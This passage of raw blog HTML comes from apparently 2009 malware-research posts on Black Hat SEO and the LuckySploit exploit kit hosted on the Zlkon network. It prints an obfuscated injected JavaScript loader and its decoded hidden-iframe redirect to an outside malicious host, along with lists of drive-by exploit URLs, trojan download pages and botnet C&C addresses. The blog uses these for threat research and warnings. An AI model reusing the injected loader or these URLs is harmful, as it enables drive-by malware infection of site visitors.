class="scam_website">tozxiqud.cn</span></td></tr></table><br />91.212.41.119<br /><br /><table width="273" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="273" height="20">hxxp://<span class="scam_website">tixwagoq.cn/in.cgi?6</span> (<a href="http://wepawet.cs.ucsb.edu/view.php?hash=ddc1c497688f76469d1f4ffa4f79902f&t=1239621305&type=js" target="_blank">Analysis</a>)<br /></td> </tr></table><br /><br /></td></tr></table></td></tr></table></div><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}</script><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434732598810973720-4182474953384058765?l=malware-web-threats.blogspot.com' alt='' /></div>Malware-Web-Threatsnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-55369463301212284662009-04-09T14:38:00.001-07:002009-04-10T08:15:50.371-07:00Black Hat SEO - RBN Hacks, p.2<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="560" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td width="572" height="833" valign="top"><p><span style="font-size:14px; font-weight:bold">The silent threat: Black Hat SEO - Cyber Crime Toolkit Exposed</span><br /><br /> Welcome to LuckySploit:) ITS TOASTED<br /> <br /></p><table width="549" height="136" border="0" cellpadding="0" cellspacing="0"><tr><td width="549"><table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"><tr><td width="266" height="29">READ <a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus" style="color: #333">THIS page</a> if you need more information<br /></td></tr></table><br /><br /><b>WARNING</b>: All sites listed on this page are dangerous (live URL with exploits) which lead <br />to trojans beeing automatically installed on your computer.<br />Do NOT visit them unless you know what you are doing. <br />(only links are safe)<br /><br /><hr /> <p>A nice article provided by Finjan about the Lucky Sploit toolkit, one of the <br /> latest script kiddies that cyber criminals used these days can be found <br /> following this link: <a href="http://www.finjan.com/MCRCblog.aspx?EntryId=2213" target="_blank">LuckySploit Toolkit Exposed</a><br /><br />Using well known technic such as "<a href="http://www.finjan.com/Content.aspx?id=1456" target="_blank">Code Obfuscation</a>" most often used to <br /> hide its first intention (sometimes randomly generated), here is one of the <br /> numerous malicious script found on several compromised website.<br /></p> <table width="508" height="119" border="1" cellpadding="0" cellspacing="0"><tr><td width="504" height="86" style="padding:15px"><iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe><br /><script>function c102916999516l4963660743084(l4963660743855){<br />var l4963660744026=16; return (parseInt(l4963660743855,l4963660744026));}<br />function l4963660744fc7(l4963660745797){<br />function l4963660746f0b(){return 2;}<br />var l4963660745f69='';<br />l4963660747eab=String.fromCharCode;<br />for(l4963660746738=0;l4963660746738<l4963660745797.length;<br />l4963660746738+=l4963660746f0b()){ <br />l4963660745f69+=(l4963660747eab(c102916999516l4963660743084(<br />l4963660745797.substr(l4963660746738,l4963660746f0b()))));}<br />return l4963660745f69;} <br />var x60='';<br />var l4963660748680='3C736'+x60+'3726'+x60+'970743E6'+x60+'96'+x60+'6'+x60<br />+'28216'+x60+'D796'+x60+'96'+x60+'1297B6'+x60+'46'+x60+'F6'+x60+'3756'+x<br />60+'D6'+x60+'56'+x60+'E742E77726'+x60+'9746'+x60+'528756'+x60+'E6'+x60+<br />'5736'+x60+'36'+x60+'1706'+x60+'528202725336'+x60+'32536'+x60+'392536'+<br />x60+'36'+x60+'2537322536'+x60+'312536'+x60+'6'+x60+'42536'+x60+<br />'352532302536'+x60+'6'+x60+'52536'+x60+'312536'+x60+'6'+x60+'42536'+x60+<br />'3525336'+x60+'42536'+x60+'332533312533302532302537332537322536'+x60+<br />'3325336'+x60+'42532372536'+x60+'3825373425373425373025336'+x60+<br />'125326'+x60+'6'+x60+'25326'+x60+'6'+x60+'2536'+x60+'372536'+x60+'6'+<br />x60+'6'+x60+'2536'+x60+'372536'+x60+'6'+x60+'6'+x60+'2533322536'+x60+<br />'6'+x60+'42536'+x60+'3525326'+x60+'52536'+x60+'6'+x60+'52536'+x60+<br />'3525373425326'+x60+'6'+x60+'25326'+x60+'52536'+x60+'372536'+x60+'6'+<br />x60+'6'+x60+'25326'+x60+'6'+x60+'2536'+x60+'332536'+x60+'382536'+x60+<br />'352536'+x60+'332536'+x60+'6'+x60+'225326'+x60+'52536'+x60+'382537342536'+<br />x60+'6'+x60+'42536'+x60+'6'+x60+'32532372532302537372536'+x60+'392536'+<br />x60+'342537342536'+x60+'3825336'+x60+'42533332533342533392532302536'+<br />x60+'382536'+x60+'352536'+x60+'392536'+x60+'372536'+x60+'3825373425336'+<br />x60+'42533352533352533372532302537332537342537392536'+x60+'6'+x60+<br />'32536'+x60+'3525336'+x60+'4253237253736'+x60+'2536'+x60+'392537332536'+<br />x60+'392536'+x60+'322536'+x60+'392536'+x60+'6'+x60+'32536'+x60+<br />'3925373425373925336'+x60+'12536'+x60+'382536'+x60+'392536'+x60+'342536'+<br />x60+'342536'+x60+'352536'+x60+'6'+x60+'525323725336'+x60+'525336'+x60+<br />'325326'+x60+'6'+x60+'2536'+x60+'392536'+x60+'36'+x60+'2537322536'+x60+<br />'312536'+x60+'6'+x60+'42536'+x60+'3525336'+x60+'52729293B7D76'+x60+'6'+<br />x60+'172206'+x60+'D796'+x60+'96'+x60+'13D7472756'+x60+'53B3C2F736'+x60+<br />'3726'+x60+'970743E';alert(l4963660744fc7(l4963660748680));<br /></script> </td></tr> </table> <br /> The deobfuscated result is:<br /> <br /> <table width="513" height="119" border="1" cellpadding="0" cellspacing="0"><tr><td width="509" height="86" style="padding:15px"><script><br />if(!myia){document.write(unescape('%3c%69%66%72%61%6d%65%20%6e<br />%61%6d%65%3d%63%31%30%20%73%72%63%3d%27%68%74%74%70%3a%<br />2f%2f%67%6f%67%6f%32%6d%65%2e%6e%65%74%2f%2e%67%6f%2f%63%<br />68%65%63%6b%2e%68%74%6d%6c%27%20%77%69%64%74%68%3d%33%<br />34%39%20%68%65%69%67%68%74%3d%35%35%37%20%73%74%79%6c%<br />65%3d%27%76%69%73%69%62%69%6c%69%74%79%3a%68%69%64%64%<br />65%6e%27%3e%3c%2f%69%66%72%61%6d%65%3e'));}<br />var myia=true;<br /></script></td></tr> </table> <br />
and then load the IFRAME.<br /><br /> <table width="460" height="63" border="1" cellpadding="0" cellspacing="0"><tr><td width="499" height="61" style="padding:15px"><iframe name=c10 src='hxxp://gogo2me.net/.go/check.html' width=349 height=557 style='visibility:hidden'></iframe></td></tr> </table> <p>Note that the script found in the second redirection show a lot of chat which refer <br /> different IPs or hacking problems (IFRAME injected) <a href="http://www.google.com/search?hl=en&q="if(!myia)"%20iframe" target="_blank">Google search for "if(!myia)" iframe </a><br /><br /><br />An example of site on the same IP:<br /><br /><span style="padding:15px">gogo2me.net</span>resolve to <span style="padding:15px">94.247.2.157 [hs.2-157.zlkon.lv]<br /><br /> and then load an IFRAME (with the LuckySpoit)<br /></span></p> <table width="536" height="63" border="1" cellpadding="0" cellspacing="0"><tr><td width="532" height="61" style="padding:15px">hxxp://94.247.2.157/.dif/go.php?sid=1<br />hxxp://94.247.2.157/.lck/?t=3<br />hxxp://94.247.2.157/.lck/?t=6 <br />http://94.247.2.157/.lck/?90f6ff8e287ae123...<br />http://94.247.2.157/.lck/?75c4a0ecf4a4836...</td></tr> </table> <p><a href="http://wepawet.iseclab.org/view.php?hash=53e2d900bba11fc1f78c011fbb8413f6&t=1232989747&type=js" target="_blank">Wepawet Analysis</a><br /><br />
A <a href="http://www.threatexpert.com/report.aspx?md5=8ac678d117c5ce0970f52903f8a610b0">ThreatExpert analysis</a> also indicate the relationship with these viruses/malware:<br /><br />Zlob variant (<a href="http://www.threatexpert.com/threats/trojan-spy-win32-zbot.html">Trojan-Spy.Win32.Zbot</a>), keylogger's trojan (<a href="http://www.threatexpert.com/threats/trojan-spy-zbot-yeth.html">Trojan-Spy.Zbot.YETH</a>) and some<br />TDSS (Alias Alureon) variant <a href="http://www.threatexpert.com/threats/virus-win32-fasec.html">Win32.Fasec [Ikarus]</a><br /><a href="http://www.threatexpert.com/threats/virus-win32-fasec.html"></a><br /><br /> And here I just show you the line :) Also note the use of RSA algorithm (screenshot)<br /></p> <table width="333" height="119" border="1" cellpadding="0" cellspacing="0"><tr><td width="329" height="86" style="padding:15px">nextkey = ''; <br />k = '';<br />attack_level = 0;<br />try {<br />f = '<b>Welcome to LuckySploit:) \n ITS TOASTED</b>';<br />} catch (e){<br />} </td></tr> </table> <br /> <p> <a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sdsn8NE9EII/AAAAAAAAAYA/zcftPFwI31I/s1600-h/rsa-lucky-powned.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 226px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sdsn8NE9EII/AAAAAAAAAYA/zcftPFwI31I/s320/rsa-lucky-powned.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5321891299924447362" /></a><br /><br /><br /><br /><br /><br /><br /> </p></td></tr><tr><td> </td></tr> </table></td></tr></table></div><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}</script><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434732598810973720-5536946330121228466?l=malware-web-threats.blogspot.com' alt='' /></div>Malware-Web-Threatsnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-53896671711279753732009-04-09T14:34:00.000-07:002009-04-19T11:51:12.722-07:00Black Hat SEO - RBN Hacks, p.1<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="560" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td width="572" height="833" valign="top"><p><span style="font-size:14px; font-weight:bold">The silent threat: Black Hat SEO, exploits, hacks, botnets</span><br /><br />Inspecting the bad network <br /></p><table width="543" height="136" border="0" cellpadding="0" cellspacing="0"><tr><td width="543"><table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"><tr><td width="266" height="29">READ <a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus" style="color: #333">THIS page</a> if you need more information<br /></td></tr></table><p><b>WARNING</b>: All sites listed on this page are dangerous (live URL with exploits) <br /> which lead to trojans beeing automatically installed on your computer.<br />Do NOT visit them unless you know what you are doing. <br />(only links are safe)<br /><br /><hr /><p>If you want information about desinfection check out this page:<br /> <a href="http://novirusthanks.org/blog/2009/03/analysis-of-a-website-infected-with-a-hidden-iframe/" target="_blank">Analysis of a website infected with a hidden iframe</a> (by NoVirusThanks)<br /> <br />This doesn't include the desinfection of your website (attacked - iframed).<br /> <br />For this change your passwords (windows passwords, FTP, emails, database <br />access etc.) and remove the content injected on each page as quickly as possible<br />(contact your hosting provider for assistance).<br /><br />This page reference domain found in thousand of compromised websites using<br />obfuscated javascript code injected (IFRAME).<br /><br /><hr />The Zlkon network (DATORU EXPRESS SERVISS) has been cited in several blogs <br /> for hosting malicious content for cyber criminals - for example:<br /><br />On Symantec website for spreading the <a href="http://www.symantec.com/en/us/security_response/writeup.jsp?docid=2008-121016-4048-99&tabid=2" target="_blank">TDSS trojan</a> [hs.2-104.zlkon.lv] - in conjunction <br />with IPs at UkrTeleGroup Ltd.in December 2008<br /><br />85.255.115.156<br />85.255.112.87<br />85.255.115.50<br />85.255.112.154<br /><br />On the <a href="http://msmvps.com/blogs/spywaresucks/archive/2009/01/21/1663955.aspx" target="_blank">msmvps' blog</a> for inaccurate whois details in January 2009<br />On bluetack.co.uk forum for rogue antivirus <a href="http://www.bluetack.co.uk/forums/index.php?showtopic=18064&st=210&p=90509&" target="_blank">here</a> in January 2009<br />Another example with "<a href="http://www.raymond.cc/forum/spyware-viruses/9785-new-rogue-antivirus.html" target="_blank">Total Defender</a>", other rogue antivirus <a href="http://realsecurity.wordpress.com/2008/12/15/sources-of-badness-zlkon/" target="_blank">here</a><br />Also found on several websites including fireeye "<a href="http://blog.fireeye.com/research/2009/02/bad-actors-part-2-zlkon.html" target="_blank">Bad Actors Part 2 - ZlKon</a>" <br /> - <a href="http://ddanchev.blogspot.com/search?q=zlkon" target="_blank">dancho danchev's blog</a> <br /> Network in conjunction cited here: <a href="http://blogs.zdnet.com/security/?p=2764" target="_blank"> Bad, bad, cybercrime-friendly ISPs!</a><br /><br /><br /><hr /><br />A quick look at two IPs at Zlkon in Latvia <br /><br /><br />94.247.3.152 [hs.3-152.zlkon.lv]<br /><br />Using the dns <br /><br />ns1.freednshostserver.com [78.109.18.234]<br />ns1.freednshostserver.com [78.109.18.235] <br /><br />descr: Datacenter Hosting.UA<br />route: 78.109.16.0/20 <br />origin: AS41665<br /><br />we have these domain currently live and kicking a lot of websites <br />(simply enter a domain or "<span class="trojans_luckysploit">in.cgi?cocacola</span>" in google reveal a lot of chat related to <br />hacked domain iframed.)<br /><br /></p><table width="431" border="0" cellspacing="0" cellpadding="0"><tr> <td><span class="trojans_luckysploit">betstarwager.cn/in.cgi?cocacola</span></td> <td><a href="http://wepawet.iseclab.org/view.php?hash=bbe9cd33895ddb68493a16f62350b287&t=1239052803&type=js" target="_blank">Analysis</a></td></tr><tr> <td width="266"><span class="trojans_luckysploit">bestlotron.cn/in.cgi?cocacola</span></td> <td width="165"><a href="http://wepawet.iseclab.org/view.php?hash=60a1b098ebbd8a0a856e90100d9244e3&t=1239052609&type=js" target="_blank">Analysis</a></td> </tr><tr> <td><span class="trojans_luckysploit">denverfilmdigitalmedia.cn/in.cgi?cocacola</span></td> <td><a href="http://wepawet.iseclab.org/view.php?hash=16d7159bfd0d418d6e06ab65f7d8d790&t=1239052806&type=js" target="_blank">Analysis</a></td> </tr><tr> <td><span class="trojans_luckysploit">diettopseek.cn/in.cgi?cocacola</span></td> <td><a href="http://wepawet.iseclab.org/view.php?hash=44eb05a65e07e2b4a6a1b62fa7223e14&t=1239052811&type=js" target="_blank">Analysis</a></td></tr><tr> <td><span class="trojans_luckysploit">filmlifemusicsite.cn/in.cgi?cocacola</span></td> <td><a href="http://wepawet.iseclab.org/view.php?hash=e51f24301e2dfd7f50345f7e34a43542&t=1239240102&type=js" target="_blank">Analysis</a></td> </tr><tr> <td><span class="trojans_luckysploit">filmlifemusicsite.cn</span>/</td> <td><a href="http://wepawet.iseclab.org/view.php?hash=bbdcccf14f5edd00a9ad9c5a38bcd405&t=1237403830&type=js" target="_blank">Analysis</a></td></tr><tr> <td><span class="trojans_luckysploit">filmtypemedia.cn/in.cgi?cocacola</span></td> <td><a href="http://wepawet.iseclab.org/view.php?hash=d105fe8dbf2312a2acb0758753641453&t=1237293959&type=js" target="_blank">Analysis</a></td> </tr><tr> <td><span class="trojans_luckysploit">litedownloadseek.cn/in.cgi?cocacola</span></td> <td><a href="http://wepawet.iseclab.org/view.php?hash=ac0f1c55cfee34869d00133fddf7be6c&t=1239052790&type=js" target="_blank">Analysis</a></td></tr><tr> <td><span class="trojans_luckysploit">litetopfindworld.cn/in.cgi?cocacola</span></td> <td><a href="http://wepawet.iseclab.org/view.php?hash=5b0a23d369d4e147ef587d57a1502a53&t=1239052785&type=js" target="_blank">Analysis</a></td> </tr><tr> <td><span class="trojans_luckysploit">litetoplocatesite.cn/in.cgi?cocacola</span></td> <td><a href="http://wepawet.iseclab.org/view.php?hash=d881cfdc9c2ff0ed01417d02b5ca099f&t=1239052789&type=js" target="_blank">Analysis</a></td> </tr><tr> <td><span class="trojans_luckysploit">nanotopfind.cn/in.cgi?cocacola</span></td> <td><a href="http://wepawet.iseclab.org/view.php?hash=ca10a92f348cc68315b5a77b61e6325a&t=1239052787&type=js" target="_blank">Analysis</a></td> </tr><tr> <td><span class="trojans_luckysploit">promixgroup.cn/in.cgi?cocacola</span></td> <td><a href="http://wepawet.iseclab.org/view.php?hash=9dd3221d3789cb6adc758610a48ebb5a&t=1239052802&type=js" target="_blank">Analysis</a></td> </tr><tr> <td><span class="trojans_luckysploit">yourliteseek.cn/in.cgi?cocacola</span></td> <td><a href="http://wepawet.iseclab.org/view.php?hash=2587c7959e1726de2ba36e2988c1a74d&t=1239052792&type=js" target="_blank">Analysis</a></td> </tr><tr> <td> </td> <td> </td></tr><tr> <td><span class="trojans_luckysploit">ghrgt.hostindianet.com/index.php</span></td> <td><a href="http://wepawet.iseclab.org/view.php?hash=bbe9cd33895ddb68493a16f62350b287&t=1239052803&type=js" target="_blank">Analysis</a></td></tr><tr> <td><span class="trojans_luckysploit">lieliteautobody.cn/load.php?id=4<br />[94.247.3.151] </span></td> <td><a href="http://anubis.iseclab.org/?action=result&task_id=16e978b65ea02b6641566b279bd76918a" target="_blank">Anubis</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=16e978b65ea02b6641566b279bd76918a" target="_blank">VirusTotal</a><br />
Botnet C&C: 213.155.4.82<br /><a href="http://anubis.iseclab.org/index.php?action=show_cluster&cluster_id=1175580">Anubis Family 1175580</a><br /></td> </tr><tr> <td> </td> <td> </td></tr><tr> <td><span class="trojans_luckysploit">ghrgt.hostindianet.com/cache/readme.pdf</span></td> <td><a href="http://wepawet.cs.ucsb.edu/view.php?type=js&hash=53174ae137690fab4987e35ad66c6989&t=1237602362" target="_blank">Analysis</a></td></tr><tr> <td><span class="trojans_luckysploit">zzzz.hostindianet.com/load.php?id=4</span></td> <td><a href="http://anubis.iseclab.org/?action=result&task_id=17853954c8943ac946177e41ebe0e066b" target="_blank">Anubis</a> - <a href="http://www.virustotal.com/analisis/385099e73f02b35dfe596adb177f0524" target="_blank">VirusTotal</a> <br />Botnet C&C: <br />213.155.4.80<br />78.109.30.224</td></tr><tr> <td> </td> <td> </td></tr><tr> <td height="80" colspan="2"><br />Also cited on Dancho Danchv's blog <a href="http://ddanchev.blogspot.com/2009/03/azerbaijanian-embassies-in-pakistan-and.html" target="_blank">here</a> in the serie of embassies websites iframed. (11 of them - including hostindianet[.]com) <a href="http://wepawet.iseclab.org/view.php?hash=100c37951c22d9a6e2b22a10f802b65c&t=1236822958&type=js"><br /></a></td> </tr></table><br /><br /><br /><br /><hr />
On the next IP:<br /><br />94.247.3.151 [hs.3-152.zlkon.lv]<br /><br /><table width="512" border="1" cellspacing="0" cellpadding="0" bordercolor="#CCCCCC"><tr> <td><span class="trojan">hxxp://bigtopescorts.cn/in.cgi?id1000 (dead)</span></td> <td width="276"> </td></tr><tr> <td height="86">hxxp://cheapslotplay.cn/in.cgi?income48</td> <td>Redirect to exploit<br />hxxp://hyperliteautoservices.cn/index.php (dead)<br />but the trojan is still available on<br />hyperliteautoservices.cn/load.php <br /><a href="http://www.virustotal.com/analisis/fb784b1a5c3fa2c71c03d7570fdec747">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank">Anubis</a></td> </tr><tr> <td>hxxp://daddybigtop.cn<a href="http://wepawet.iseclab.org/view.php?hash=ef3063188a85f075510764cdd4f37d9e&t=1239059094&type=js" target="_blank"><br /> </a></td> <td>Load trojan on<br />hxxp://freeonlinehostguide.com/load.php<br /><a href="http://www.virustotal.com/analisis/0f7fb579481d87a965698099c36d70a4">VirusTotal</a> - <a href="http://wepawet.iseclab.org/view.php?hash=ef3063188a85f075510764cdd4f37d9e&t=1239059094&type=js" target="_blank">Redirection Analysis</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1552cc1212a74b88461563200051fe3b5" target="_blank">Anubis</a><br />Detection: <br />Trojan-Downloader.Win32.Bredolab!IK <br />TR/Crypt.ZPACK.Gen <br />Trojan-Downloader.Win32.Bredolab<br />Trojan:Win32/Meredrop <br /><br />Using a stack overflow in adobe reader 8.1.2 <br /><a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-2992" target="_blank">CVE-2008-2992</a></td> </tr><tr> <td height="26">hxxp://educationbigtop.cn</td> <td><a href="http://www.virustotal.com/analisis/0f7fb579481d87a965698099c36d70a4" target="_blank">VirusTotal Report</a> (Brebolab)</td></tr><tr> <td><span class="trojan">hxxp://freehostinternet.com</span></td> <td>Load trojan on<br />hxxp://daddybigtop.cn/load.php<br /><a href="http://www.virustotal.com/analisis/2204575b3999d57b3bfc3e83f43fcd6e">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=137aa20f0f4fcbc34e5ba23aedef48abb" target="_blank">Anubis</a><br />Detection: <br />Trojan-Downloader.Win32.Bredolab<br /> <br /> Connect to botnet: 213.155.6.33<br /></td></tr><tr> <td width="230" height="206"><span class="trojans_luckysploit">hxxp://freeonlinehostguide.com/<br />index.php</span></td> <td>Load trojan on<br />hxxp://zzz.free.hostindianet.com/load.php?id=4<br /><a href="http://www.virustotal.com/analisis/65bac13aaf82cffdd84cf63bf64f0dbe">VirusTotal</a> - <a href="http://wepawet.iseclab.org/view.php?hash=5802a3beabd9368daf35ad1eb4a995b3&t=1238099033&type=js" target="_blank">Javascript Analysis</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=17a3cc78e642b0a742187d9341ae4bcec" target="_blank">Anubis</a><br />Detection: <br />TR/Crypt.XPACK.Gen<br />Win32:Walpak<br />Win32/Kryptik.LI<br />Trojan.Waledac.Gen!Pac.8 <br /><br />It connect to a URL and drop the file "digiwet.dll"<br />Botnets C&C: <br />turokgame.cn [74.50.98.156]<br />94.247.2.95 and 78.109.30.224<br /></td> </tr><tr> <td height="26"><span class="trojan">hxxp://freewebhostguide.com</span></td> <td><a href="http://safeweb.norton.com/report/show?name=freewebhostguide.com" target="_blank">Symantec</a><a href="http://wepawet.iseclab.org/view.php?hash=44eb05a65e07e2b4a6a1b62fa7223e14&t=1239052811&type=js" target="_blank"></a></td></tr><tr> <td><span class="trojan">hxxp://greatbethere.cn</span></td> <td>Load trojan on<br />hxxp://greatbethere.cn/load.php?id=4<br /><a href="http://www.virustotal.com/analisis/893c4ed46d09f4d1c43ae40fbdef2bf8">VirusTotal</a> - <a href="http://wepawet.iseclab.org/view.php?hash=666f614786902fd2352c0039e9dd2d04&t=1238102754&type=js" target="_blank">Javascript Analysis</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1e76a4475454c09940d2671f4c52d7293" target="_blank">Anubis</a><br />Detection: <br />TR/Crypt.XPACK.Gen<br />Win32:Walpak<br />Win32/Kryptik.LI<br />Trojan.Waledac.Gen!Pac.8 <br /><br />Using a stack overflow in adobe reader 8.1.1 <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5659" target="_blank">CVE-2007-5659</a> <br /><br />It connect to a URL and drop the file "digiwet.dll"<br />Botnets C&C: <br />213.155.6.32<br />78.109.30.224<br /></td></tr><tr> <td height="26">hxxp://hugetopnonfat.cn</td> <td>dead</td></tr><tr> <td height="83"><span class="trojan">hxxp://mediahomenamemartvideo.cn/<br />in.cgi?income</span></td> <td>Botnet C&C / redirect to exploit<br />hxxp://hyperliteautoservices.cn/index.php (dead)<br />but the trojan is still available on<br />hyperliteautoservices.cn/load.php <br /><a href="http://www.virustotal.com/analisis/fb784b1a5c3fa2c71c03d7570fdec747">VirusTotal</a> - <a href="http://wepawet.iseclab.org/view.php?hash=dbf20d61a135033ff904d1e4aa193469&t=1239238663&type=js" target="_blank">Redirection Analysis</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank">Anubis</a></td></tr><tr> <td height="131">hxxp://hyperliteautoservices.cn</td> <td>Redirect to exploit<br />hxxp://hyperliteautoservices.cn/index.php<br />but the trojan is still available on<br />hyperliteautoservices.cn/load.php <br /><a href="http://www.virustotal.com/analisis/8327265e423bd2c7e19456119d389691">VirusTotal</a> - <a href="http://wepawet.cs.ucsb.edu/view.php?type=js&hash=e161c0d6038be58eb3b1e4922d78f71f&t=1239143673" target="_blank">Redirection Analysis</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=18be328f7652759e471e87bf6afa41cf8" target="_blank">Anubis<br /></a> Flash exploit is also live:<br />
<br /><a href="http://wepawet.cs.ucsb.edu/view.php?type=js&hash=e161c0d6038be58eb3b1e4922d78f71f&t=1239143673" target="_blank">Flash Analysis</a><br />Botnet C&C: 78.109.29.112 <br /></td> </tr><tr> <td height="20">hxxp://lieliteautobody.cn (dead)</td> <td> </td></tr><tr> <td height="36"><span class="trojans_luckysploit">hxxp://liteautofinestsite.cn/load.php</span></td> <td>Exploit not found but trojan still there<br /><span class="trojans_luckysploit">hxxp://liteautofinestsite.cn/load.php</span><br /></td> </tr><tr><td height="117">hxxp://liteautogreatest.cn</td><td>Exploits<br /> hxxp://liteautogreatest.cn/cache/readme.pdf<br /> hxxp://liteautogreatest.cn/cache/flash.swf <br /> to load trojan on<br /> hxxp://liteautogreatest.cn/load.php<br /> <a href="http://www.virustotal.com/analisis/6585b1eb0192e6e808c537c09c61d25d">VirusTotal</a> - <a href="http://wepawet.cs.ucsb.edu/view.php?hash=88dbec3ba9da0df0a5f94806ec303516&t=1239816944&type=js" target="_blank">Redirection Analysis</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=19d052d8429d68d3409883523bde4b33d" target="_blank">Anubis<br /> <br /> </a> Flash exploit is also live:<br /> <a href="http://wepawet.cs.ucsb.edu/view.php?type=js&hash=e161c0d6038be58eb3b1e4922d78f71f&t=1239143673" target="_blank">Flash Analysis</a> - <a href="http://www.virustotal.com/analisis/d53523199a75b38f03300473508594d8" target="_blank">VirusTotal</a><br /> <br /> Botnet C&C: 78.109.29.112</td></tr>
<tr> <td height="117"><span class="trojans_luckysploit">hxxp://liteautorepair.cn</span></td> <td>Exploit to load trojan on <br />zzzz.hostindianet.com/load.php?id=4<br /><a href="http://www.virustotal.com/analisis/37d49709ee09ba69072ce158ec0a4ddb">VirusTotal</a> - <a href="http://wepawet.iseclab.org/view.php?hash=f4bec9780ebb9269d46becfb0557e391&t=1238886038&type=js" target="_blank">Redirection Analysis</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1fff28d7a01d6b344ed7184ef3ca0537f" target="_blank">Anubis</a><br /><br />Detection:<br />Trojan-Downloader.Win32.Bredolab<br /><br />Botnet controller: 213.155.4.82 </td></tr><tr> <td height="119">hxxp://litedownloadfinest.cn</td> <td>Exploit to load trojan on <br />zzzz.hostindianet.com/load.php?id=4<br /><a href="http://www.virustotal.com/analisis/4b25552e0659179a22fec8cc6208ad57">VirusTotal</a> - <a href="http://wepawet.iseclab.org/view.php?hash=233e11cebbf860a6b689cd27b0a0cd92&t=1239013312&type=js" target="_blank">Redirection Analysis</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=158efd3418e4e7c8495803043e3960cb9&format=html" target="_blank">Anubis</a><br /><br />Detection:<br />TrojanDownloader:Win32/Bredolab.B<br /><br />Previous botnet controller: 78.109.29.112</td> </tr><tr> <td height="148"><span class="trojans_luckysploit">hxxp://litehitscar.cn/index.php</span></td> <td>Exploit to load trojan on <br />hyperliteautoservices.cn/load.php?id=4<br /><a href="http://www.virustotal.com/analisis/fb784b1a5c3fa2c71c03d7570fdec747">VirusTotal</a> - <a href="http://wepawet.iseclab.org/view.php?hash=0427b7627c9938608b886b095702247a&t=1239205859&type=js" target="_blank">Redirection Analysis</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank">Anubis</a><br /><br />Detection:<br />Trojan.Botnetlog.3<br /><br />Botnets: <br />78.109.29.112 - 78.109.30.224<br />74.54.77.82</td> </tr><tr> <td height="37"><span class="trojans_luckysploit">hxxp://lieliteautobody.cn/load.php</span></td> <td>Exploit not found but trojan still there<br /><span class="trojans_luckysploit">lieliteautobody.cn/load.php</span><br /></td> </tr><tr> <td height="38">hxxp://liteautofinestsite.cn/load.php</td> <td>Exploit not found but trojan still there<br /><span class="trojans_luckysploit">liteautofinestsite.cn/load.php</span><br /></td> </tr>
<tr><td height="148"><span class="trojans_luckysploit">hxxp://liteupyourride.cn/</span></td><td>Exploits<br /> hxxp://<span class="trojans_luckysploit">liteupyourride.cn</span>/cache/readme.pdf<br /> hxxp://<span class="trojans_luckysploit">liteupyourride.cn</span>/cache/flash.swf <br /> to load trojan on<br /> hxxp://<span class="trojans_luckysploit">litehitscar.cn</span>/load.php<br /><a href="http://www.virustotal.com/analisis/07cbfa835cf93c2f866d7e7fa18eabf5">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1f36ed14afffc55d4718874ebbc2924cf&call=first" target="_blank">Anubis<br /><br /></a> PDF exploit is also live:<br /><a href="http://wepawet.cs.ucsb.edu/view.php?hash=4925255f3716377f7fcb7c9bfb038795&t=1240163655&type=js" target="_blank">PDF Analysis</a> - <a href="http://www.virustotal.com/analisis/46adc25de221146ea1a2458c97602518" target="_blank">VirusTotal</a><br /><br /> Botnet C&C: 78.109.29.112</td></tr>
